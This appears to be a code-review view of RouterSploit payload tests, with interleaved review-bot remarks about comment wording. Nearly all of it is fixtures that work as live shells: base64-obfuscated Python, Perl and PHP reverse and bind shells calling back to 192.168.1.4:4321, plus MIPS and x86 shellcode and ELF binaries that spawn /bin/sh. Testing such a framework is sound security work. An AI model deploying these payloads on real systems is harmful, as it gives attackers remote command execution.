# python bind udp payload with rport=4321
bind_udp = (
"python -c \"exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))\""
)
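Review bot: the two header comments `# bind udp payload with rport=4321` and `# python bind udp payload with rport=4321` are duplicates; keep the second, which names the module like the other test files do. The `test_payload_generation` body for this file is collapsed in the view, so it could not be checked here.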
......
from routersploit.modules.payloads.cmd.python_reverse_tcp import Exploit
# python reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"python -c \"exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))\""
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
from routersploit.modules.payloads.cmd.python_reverse_udp import Exploit
# reverse udp payload with lhost=192.168.1.4 lport=4321
# python reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_udp = (
"python -c \"exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))\""
)
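Review bot: duplicated header comment again (`# reverse udp payload ...` followed by `# python reverse udp payload ...`); drop the first so the file matches its siblings.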
......
from routersploit.modules.payloads.mipsbe.bind_tcp import Exploit
# mipsbe bind tcp payload with rport=4321
bind_tcp = (
b"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01\xc0\x28"
b"\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x30\x50"
b"\xff\xff\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d\xff\xfd\x01"
b"\xa0\x68\x27\x01\xcd\x68\x04\x24\x0e\x10\xe1\x01\xae\x68\x25"
b"\xaf\xad\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff"
b"\xec\x02\x10\x20\x25\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5"
b"\xff\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x02\x10\x20\x25\x24"
b"\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x02\x10\x20\x25"
b"\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48\x01\x01\x01"
b"\x0c\xaf\xa2\xff\xff\x24\x11\xff\xfd\x02\x20\x88\x27\x8f\xa4"
b"\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24"
b"\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff"
b"\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e"
b"\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4"
b"\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24"
b"\x02\x0f\xab\x01\x01\x01\x0c"
)
# elf mipsbe bind tcp
elf_mipsbe_bind_tcp = (
b"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x00\x54\x00\x00"
b"\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00"
b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00"
b"\x00\x40\x00\x00\x00\x40\x00\x00\x00\x00\x01\x3c\x00\x00\x02"
b"\x24\x00\x00\x00\x07\x00\x00\x10\x00\x27\xbd\xff\xe0\x24\x0e"
b"\xff\xfd\x01\xc0\x20\x27\x01\xc0\x28\x27\x28\x06\xff\xff\x24"
b"\x02\x10\x57\x01\x01\x01\x0c\x30\x50\xff\xff\x24\x0e\xff\xef"
b"\x01\xc0\x70\x27\x24\x0d\xff\xfd\x01\xa0\x68\x27\x01\xcd\x68"
b"\x04\x24\x0e\x10\xe1\x01\xae\x68\x25\xaf\xad\xff\xe0\xaf\xa0"
b"\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x02\x10\x20\x25\x24"
b"\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49"
b"\x01\x01\x01\x0c\x02\x10\x20\x25\x24\x05\x01\x01\x24\x02\x10"
b"\x4e\x01\x01\x01\x0c\x02\x10\x20\x25\x28\x05\xff\xff\x28\x06"
b"\xff\xff\x24\x02\x10\x48\x01\x01\x01\x0c\xaf\xa2\xff\xff\x24"
b"\x11\xff\xfd\x02\x20\x88\x27\x8f\xa4\xff\xff\x02\x20\x28\x21"
b"\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff\x22\x31\xff"
b"\xff\x16\x30\xff\xfa\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef"
b"\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf"
b"\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8"
b"\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01"
b"\x0c"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
assert payload.generate_elf(bind_tcp) == elf_mipsbe_bind_tcp
from routersploit.modules.payloads.mipsbe.reverse_tcp import Exploit
# mipsbe reverse tcp with lhost=192.168.1.4 lport=4321
reverse_tcp = (
b"\x28\x04\xff\xff\x24\x02\x0f\xa6\x01\x09\x09\x0c\x28\x04\x11"
b"\x11\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01\x80"
b"\x20\x27\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01"
b"\x80\x20\x27\x01\x80\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57"
b"\x01\x09\x09\x0c\x30\x44\xff\xff\x24\x02\x0f\xc9\x01\x09\x09"
b"\x0c\x24\x02\x0f\xc9\x01\x09\x09\x0c\x3c\x05\x00\x02\x34\xa5"
b"\x10\xe1\xaf\xa5\xff\xf8\x3c\x05\xc0\xa8\x34\xa5\x01\x04\xaf"
b"\xa5\xff\xfc\x23\xa5\xff\xf8\x24\x0c\xff\xef\x01\x80\x30\x27"
b"\x24\x02\x10\x4a\x01\x09\x09\x0c\x3c\x08\x2f\x2f\x35\x08\x62"
b"\x69\xaf\xa8\xff\xec\x3c\x08\x6e\x2f\x35\x08\x73\x68\xaf\xa8"
b"\xff\xf0\x28\x07\xff\xff\xaf\xa7\xff\xf4\xaf\xa7\xff\xfc\x23"
b"\xa4\xff\xec\x23\xa8\xff\xec\xaf\xa8\xff\xf8\x23\xa5\xff\xf8"
b"\x27\xbd\xff\xec\x28\x06\xff\xff\x24\x02\x0f\xab\x00\x90\x93"
b"\x4c"
)
# elf mipsbe reverse tcp
elf_mipsbe_reverse_tcp = (
b"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x00\x54\x00\x00"
b"\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00"
b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00"
b"\x00\x40\x00\x00\x00\x40\x00\x00\x00\x00\x01\x18\x00\x00\x01"
b"\xdc\x00\x00\x00\x07\x00\x00\x10\x00\x28\x04\xff\xff\x24\x02"
b"\x0f\xa6\x01\x09\x09\x0c\x28\x04\x11\x11\x24\x02\x0f\xa6\x01"
b"\x09\x09\x0c\x24\x0c\xff\xfd\x01\x80\x20\x27\x24\x02\x0f\xa6"
b"\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01\x80\x20\x27\x01\x80\x28"
b"\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x09\x09\x0c\x30\x44"
b"\xff\xff\x24\x02\x0f\xc9\x01\x09\x09\x0c\x24\x02\x0f\xc9\x01"
b"\x09\x09\x0c\x3c\x05\x00\x02\x34\xa5\x10\xe1\xaf\xa5\xff\xf8"
b"\x3c\x05\xc0\xa8\x34\xa5\x01\x04\xaf\xa5\xff\xfc\x23\xa5\xff"
b"\xf8\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a\x01\x09"
b"\x09\x0c\x3c\x08\x2f\x2f\x35\x08\x62\x69\xaf\xa8\xff\xec\x3c"
b"\x08\x6e\x2f\x35\x08\x73\x68\xaf\xa8\xff\xf0\x28\x07\xff\xff"
b"\xaf\xa7\xff\xf4\xaf\xa7\xff\xfc\x23\xa4\xff\xec\x23\xa8\xff"
b"\xec\xaf\xa8\xff\xf8\x23\xa5\xff\xf8\x27\xbd\xff\xec\x28\x06"
b"\xff\xff\x24\x02\x0f\xab\x00\x90\x93\x4c"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
assert payload.generate_elf(reverse_tcp) == elf_mipsbe_reverse_tcp
from routersploit.modules.payloads.mipsle.bind_tcp import Exploit
# mipsle bind tcp payload with rport=4321
bind_tcp = (
b"\xe0\xff\xbd\x27\xfd\xff\x0e\x24\x27\x20\xc0\x01\x27\x28\xc0"
b"\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff"
b"\x50\x30\xef\xff\x0e\x24\x27\x70\xc0\x01\x10\xe1\x0d\x24\x04"
b"\x68\xcd\x01\xfd\xff\x0e\x24\x27\x70\xc0\x01\x25\x68\xae\x01"
b"\xe0\xff\xad\xaf\xe4\xff\xa0\xaf\xe8\xff\xa0\xaf\xec\xff\xa0"
b"\xaf\x25\x20\x10\x02\xef\xff\x0e\x24\x27\x30\xc0\x01\xe0\xff"
b"\xa5\x23\x49\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02\x01"
b"\x01\x05\x24\x4e\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02"
b"\xff\xff\x05\x28\xff\xff\x06\x28\x48\x10\x02\x24\x0c\x01\x01"
b"\x01\xff\xff\xa2\xaf\xfd\xff\x11\x24\x27\x88\x20\x02\xff\xff"
b"\xa4\x8f\x21\x28\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff"
b"\xff\x10\x24\xff\xff\x31\x22\xfa\xff\x30\x16\xff\xff\x06\x28"
b"\x62\x69\x0f\x3c\x2f\x2f\xef\x35\xec\xff\xaf\xaf\x73\x68\x0e"
b"\x3c\x6e\x2f\xce\x35\xf0\xff\xae\xaf\xf4\xff\xa0\xaf\xec\xff"
b"\xa4\x27\xf8\xff\xa4\xaf\xfc\xff\xa0\xaf\xf8\xff\xa5\x27\xab"
b"\x0f\x02\x24\x0c\x01\x01\x01"
)
# elf mipsle bind tcp
elf_mipsle_bind_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x40\x00\x3c\x01\x00\x00\x24\x02\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\xe0\xff\xbd\x27\xfd\xff"
b"\x0e\x24\x27\x20\xc0\x01\x27\x28\xc0\x01\xff\xff\x06\x28\x57"
b"\x10\x02\x24\x0c\x01\x01\x01\xff\xff\x50\x30\xef\xff\x0e\x24"
b"\x27\x70\xc0\x01\x10\xe1\x0d\x24\x04\x68\xcd\x01\xfd\xff\x0e"
b"\x24\x27\x70\xc0\x01\x25\x68\xae\x01\xe0\xff\xad\xaf\xe4\xff"
b"\xa0\xaf\xe8\xff\xa0\xaf\xec\xff\xa0\xaf\x25\x20\x10\x02\xef"
b"\xff\x0e\x24\x27\x30\xc0\x01\xe0\xff\xa5\x23\x49\x10\x02\x24"
b"\x0c\x01\x01\x01\x25\x20\x10\x02\x01\x01\x05\x24\x4e\x10\x02"
b"\x24\x0c\x01\x01\x01\x25\x20\x10\x02\xff\xff\x05\x28\xff\xff"
b"\x06\x28\x48\x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xfd"
b"\xff\x11\x24\x27\x88\x20\x02\xff\xff\xa4\x8f\x21\x28\x20\x02"
b"\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x10\x24\xff\xff\x31"
b"\x22\xfa\xff\x30\x16\xff\xff\x06\x28\x62\x69\x0f\x3c\x2f\x2f"
b"\xef\x35\xec\xff\xaf\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35\xf0"
b"\xff\xae\xaf\xf4\xff\xa0\xaf\xec\xff\xa4\x27\xf8\xff\xa4\xaf"
b"\xfc\xff\xa0\xaf\xf8\xff\xa5\x27\xab\x0f\x02\x24\x0c\x01\x01"
b"\x01"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
assert payload.generate_elf(bind_tcp) == elf_mipsle_bind_tcp
from routersploit.modules.payloads.mipsle.reverse_tcp import Exploit
# mipsle reverse tcp with lhost=192.168.1.4 lport=4321
reverse_tcp = (
b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04"
b"\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20"
b"\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27"
b"\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24"
b"\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09"
b"\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x10\xe1\x05\x3c\x02\x00"
b"\xa5\x34\xf8\xff\xa5\xaf\x01\x04\x05\x3c\xc0\xa8\xa5\x34\xfc"
b"\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01"
b"\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08"
b"\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff"
b"\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec"
b"\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23"
b"\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09"
b"\x01"
)
# elf mipsle reverse tcp
elf_mipsle_reverse_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x40\x00\x18\x01\x00\x00\xdc\x01\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\xff\xff\x04\x28\xa6\x0f"
b"\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28\xa6\x0f\x02\x24\x0c"
b"\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01\xa6\x0f\x02\x24"
b"\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01\x27\x28\x80"
b"\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01\xff\xff"
b"\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24\x0c"
b"\x09\x09\x01\x10\xe1\x05\x3c\x02\x00\xa5\x34\xf8\xff\xa5\xaf"
b"\x01\x04\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf\xf8\xff\xa5"
b"\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x09"
b"\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf\x73"
b"\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
b"\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8"
b"\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff"
b"\x06\x28\xab\x0f\x02\x24\x0c\x09\x09\x01"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
assert payload.generate_elf(reverse_tcp) == elf_mipsle_reverse_tcp
from routersploit.modules.payloads.perl.bind_tcp import Exploit
# perl bind tcp payload with rport=4321
bind_tcp = (
"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
from routersploit.modules.payloads.perl.reverse_tcp import Exploit
# reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuNDo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
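Review bot: the comment `# reverse udp payload with lhost=192.168.1.4 lport=4321` is wrong for `perl.reverse_tcp`; it should say `perl reverse tcp payload`, in line with the `# perl bind tcp payload with rport=4321` header of the bind test above.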
from routersploit.modules.payloads.php.reverse_tcp import Exploit
# php reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
from routersploit.modules.payloads.python.bind_tcp import Exploit
# python bind tcp payload with rport=4321
bind_tcp = (
"exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
from routersploit.modules.payloads.python.bind_udp import Exploit
# bind udp payload with rport=4321
# python bind udp payload with rport=4321
bind_udp = (
"exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))"
)
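Review bot: the `# bind udp payload ...` / `# python bind udp payload ...` comment pair is duplicated here as in the cmd variant; keep one.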
......
from routersploit.modules.payloads.python.reverse_tcp import Exploit
# python reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
from routersploit.modules.payloads.python.reverse_udp import Exploit
# reverse udp payload with lhost=192.168.1.4 lport=4321
# python reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_udp = (
"exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))"
)
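Review bot: duplicated `# reverse udp payload ...` / `# python reverse udp payload ...` comments; keep one, as for the other udp tests.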
......
......@@ -11,6 +11,21 @@ bind_tcp = (
b"\x0b\xcd\x80"
)
# elf x86 reverse tcp
elf_x86_reverse_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x03\x00\x01\x00\x00\x00\x54\x80\x04\x08\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x80\x04\x08\x00\x80\x04\x08\xa2\x00\x00\x00\xf0\x00\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\x31\xdb\xf7\xe3\x53\x43"
b"\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00"
b"\x10\xe1\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41"
b"\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a"
b"\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62"
b"\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
def test_payload_generation():
""" Test scenario - payload generation """
......
......@@ -10,6 +10,21 @@ reverse_tcp = (
b"\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
)
# elf x86 reverse tcp
elf_x86_reverse_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x03\x00\x01\x00\x00\x00\x54\x80\x04\x08\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x80\x04\x08\x00\x80\x04\x08\x98\x00\x00\x00\xdc\x00\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\x31\xdb\xf7\xe3\x53\x43"
b"\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80"
b"\x49\x79\xf9\x68\xc0\xa8\x01\x04\x68\x02\x00\x10\xe1\x89\xe1"
b"\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f"
b"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b"
b"\xcd\x80"
)
def test_payload_generation():
""" Test scenario - payload generation """
......
......@@ -60,3 +60,19 @@ def test_scanner_info(scanner):
assert "devices" in info
assert isinstance(info["devices"], tuple)
@pytest.mark.parametrize("payload", iter_modules("./routersploit/modules/payloads"))
def test_payload_info(payload):
info = payload._Exploit__info__
assert isinstance(info, dict)
assert "name" in info
assert isinstance(info["name"], str)
assert "description" in info
assert isinstance(info["description"], str)
assert "authors" in info
assert isinstance(info["authors"], tuple)